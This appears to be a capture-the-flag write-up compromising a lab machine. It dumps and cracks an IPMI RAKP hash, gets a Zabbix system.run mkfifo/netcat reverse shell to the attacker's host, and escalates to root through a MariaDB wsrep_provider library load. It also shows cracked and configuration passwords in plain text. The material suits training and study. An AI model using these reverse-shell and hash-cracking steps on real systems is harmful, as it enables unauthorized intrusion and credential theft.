Enum

nmap

tcp

udp

# Nmap 7.92 scan initiated Sun Nov 14 21:46:39 2021 as: nmap -sU -oN nmap_udp 10.10.11.124
Nmap scan report for 10.10.11.124
Host is up (0.028s latency).
Not shown: 999 closed udp ports (port-unreach)
PORT    STATE SERVICE
623/udp open  asf-rmcp

# Nmap done at Sun Nov 14 22:03:47 2021 -- 1 IP address (1 host up) scanned in 1028.62 seconds

ffuf enumerating vhosts

monitor                 [Status: 200, Size: 3686, Words: 192, Lines: 30]
monitoring              [Status: 200, Size: 3686, Words: 192, Lines: 30]
zabbix                  [Status: 200, Size: 3686, Words: 192, Lines: 30]

ipmi

auxiliary(scanner/ipmi/ipmi_dumphashes) > options 

Module options (auxiliary/scanner/ipmi/ipmi_dumphashes):

   Name                  Current Setting                                                    Required  Description
   ----                  ---------------                                                    --------  -----------
   CRACK_COMMON          true                                                               yes       Automatically crack common passwords as they are obtained
   OUTPUT_HASHCAT_FILE                                                                      no        Save captured password hashes in hashcat format
   OUTPUT_JOHN_FILE                                                                         no        Save captured password hashes in john the ripper format
   PASS_FILE             /usr/share/metasploit-framework/data/wordlists/ipmi_passwords.txt  yes       File containing common passwords for offline cracking, one per line
   RHOSTS                                                                                   yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
   RPORT                 623                                                                yes       The target port
   SESSION_MAX_ATTEMPTS  5                                                                  yes       Maximum number of session retries, required on certain BMCs (HP iLO 4, etc)
   SESSION_RETRY_DELAY   5                                                                  yes       Delay between session retries in seconds
   THREADS               1                                                                  yes       The number of concurrent threads (max one per host)
   USER_FILE             /usr/share/metasploit-framework/data/wordlists/ipmi_users.txt      yes       File containing usernames, one per line

msf6 auxiliary(scanner/ipmi/ipmi_dumphashes) > set rhosts 10.10.11.124
rhosts => 10.10.11.124
msf6 auxiliary(scanner/ipmi/ipmi_dumphashes) > run

[+] 10.10.11.124:623 - IPMI - Hash found: Administrator:6cc0ad35020200002519f512e508955ff0450bf041025e8e9d8b35e0707445571f3708d332315356a123456789abcdefa123456789abcdef140d41646d696e6973747261746f72:a9b4ed4f145e48181e5e441d50b25b7ad6c4647b

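To show what that Metasploit line actually contains, here is an added Python parser (not part of the original writeup, Metasploit or john) that splits the `user:salt:hash` output above into the RAKP Message 2 fields. The field layout follows the IPMI 2.0 specification's HMAC input for RAKP Message 2; the dataclass and field names are my own.

```python
from dataclasses import dataclass

# Requested maximum privilege level, lower 4 bits of the role byte (IPMI 2.0).
PRIVILEGE = {1: "CALLBACK", 2: "USER", 3: "OPERATOR", 4: "ADMINISTRATOR", 5: "OEM"}

# Copied verbatim from the ipmi_dumphashes output above.
SAMPLE_LINE = (
    "Administrator:6cc0ad35020200002519f512e508955ff0450bf041025e8e9d8b35e07074"
    "45571f3708d332315356a123456789abcdefa123456789abcdef140d41646d696e69737472"
    "61746f72:a9b4ed4f145e48181e5e441d50b25b7ad6c4647b"
)


@dataclass
class RakpHash:
    user: str             # username as reported by Metasploit
    sid_remote: str       # remote console session ID (4 bytes, hex)
    sid_bmc: str          # managed system (BMC) session ID (4 bytes, hex)
    rand_remote: str      # remote console random number (16 bytes, hex)
    rand_bmc: str         # BMC random number (16 bytes, hex)
    guid_bmc: str         # BMC GUID (16 bytes, hex)
    privilege: str        # requested max privilege level, from the role byte
    name_only_lookup: bool  # bit 4 of the role byte
    username: str         # username carried inside the HMAC input
    hmac_sha1: bytes      # 20-byte HMAC-SHA1 keyed with the user's password


def parse_rakp_hash(line: str) -> RakpHash:
    """Split one Metasploit ipmi_dumphashes line into its RAKP fields.

    Everything in the salt travels unencrypted in RAKP Messages 1 and 2; the
    only secret in the computation is the password used as the HMAC key.
    """
    user, salt_hex, mac_hex = line.strip().split(":")
    salt = bytes.fromhex(salt_hex)
    mac = bytes.fromhex(mac_hex)
    if len(salt) < 58 or len(mac) != 20:
        raise ValueError("not a RAKP HMAC-SHA1 hash line")
    role, ulen = salt[56], salt[57]
    uname = salt[58:58 + ulen]
    # The username length byte must account for exactly the rest of the salt.
    if len(uname) != ulen or len(salt) != 58 + ulen:
        raise ValueError("username length byte does not match salt length")
    return RakpHash(
        user=user,
        sid_remote=salt[0:4].hex(),
        sid_bmc=salt[4:8].hex(),
        rand_remote=salt[8:24].hex(),
        rand_bmc=salt[24:40].hex(),
        guid_bmc=salt[40:56].hex(),
        privilege=PRIVILEGE.get(role & 0x0F, f"RESERVED({role & 0x0F})"),
        name_only_lookup=bool(role & 0x10),
        username=uname.decode("ascii"),
        hmac_sha1=mac,
    )
```

Running it on the captured line confirms the trailing bytes of the salt are the literal username "Administrator" with a requested Administrator privilege level.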
This is the RAKP hash IPMI 2.0 hands out before authentication, so we can crack it offline with john:

john john_hash.txt --wordlist=/usr/share/wordlists/rockyou.txt                           
Using default input encoding: UTF-8
Loaded 1 password hash (RAKP, IPMI 2.0 RAKP (RMCP+) [HMAC-SHA1 256/256 AVX2 8x])
Will run 16 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
ilovepumkinpie1  (10.10.11.124 Administrator)
1g 0:00:00:00 DONE (2021-11-14 22:17) 1.298g/s 10213Kp/s 10213Kc/s 10213KC/s in_199..giugno81
Use the "--show" option to display all of the cracked passwords reliably
Session completed

Searching for how to execute commands on Zabbix leads us to this post.

There we enter the following item key:

system.run[rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.3 9001 >/tmp/f &,nowait]

and we get our reverse shell:

$ rlwrap nc -nvlp 9001
listening on [any] 9001 ...
connect to [10.10.14.3] from (UNKNOWN) [10.10.11.124] 41472
/bin/sh: 0: can't access tty; job control turned off
whoami
zabbix
$ 

We can reuse the cracked password to pivot to the user ipmi-svc, which gives us user.txt.

If we run linpeas, we notice:

════════════════════════════════════╣ Software Information ╠════════════════════════════════════
╔══════════╣ MySQL version
mysql  Ver 15.1 Distrib 10.3.25-MariaDB, for debian-linux-gnu (x86_64) using readline 5.2

Enumerating the database credentials, we find:

cat /etc/zabbix/zabbix_server.conf | grep -v \#
[...]
DBName=zabbix
DBUser=zabbix
DBPassword=bloooarskybluh

Searching for exploits targeting that MariaDB version, we find this.

We follow the steps and finally execute:

mysql -u zabbix -pbloooarskybluh -e 'SET GLOBAL wsrep_provider="/dev/shm/tmp.so";'
$ rlwrap nc -nvlp 9002
listening on [any] 9002 ...
connect to [10.10.14.3] from (UNKNOWN) [10.10.11.124] 51864
python3 -c "import pty;pty.spawn('/bin/bash')"
whoami
whoami
root
root@shibboleth:/var/lib/mysql#